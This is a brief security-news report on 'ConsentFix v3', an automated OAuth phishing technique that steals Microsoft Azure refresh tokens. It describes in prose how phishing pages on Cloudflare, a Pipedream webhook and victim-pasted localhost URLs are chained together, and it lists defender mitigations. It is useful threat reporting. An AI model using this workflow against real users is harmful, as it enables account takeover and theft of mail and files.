A new attack technique called ConsentFix v3 has emerged on hacker forums, automating OAuth abuse against Microsoft Azure environments through improved scalability. The attack begins by verifying tenant presence and gathering employee details, then creating multiple accounts across services including Outlook, Cloudflare, and Pipedream for phishing and exfiltration operations. Pipedream serves three critical roles as the webhook endpoint receiving authorization codes, the automation engine exchanging codes for refresh tokens, and the central token collector.
Attackers deploy phishing pages on Cloudflare Pages that mimic legitimate Microsoft interfaces, initiating real OAuth flows through Microsoft's login endpoints. Victims are tricked into pasting or dragging localhost URLs containing authorization codes back into phishing pages, triggering automated token exchange via Pipedream. The obtained tokens are then imported into Specter Portal, allowing attackers to access compromised resources including email and files.
Push Security researchers note that mitigation is complicated because trust in first-party Microsoft apps is architectural. Administrators can apply token binding to trusted devices, set up behavioral detection rules, and enforce app authentication restrictions. Earlier versions of ConsentFix relied on manual copy-paste or drag-and-drop of authorization codes, while the new variant introduces full automation. It remains unclear whether ConsentFix v3 has gained significant traction among cybercriminals in actual campaigns. Testing was conducted primarily using personal Microsoft accounts, making full impact assessment difficult due to varying permissions and tenant settings.
Read more...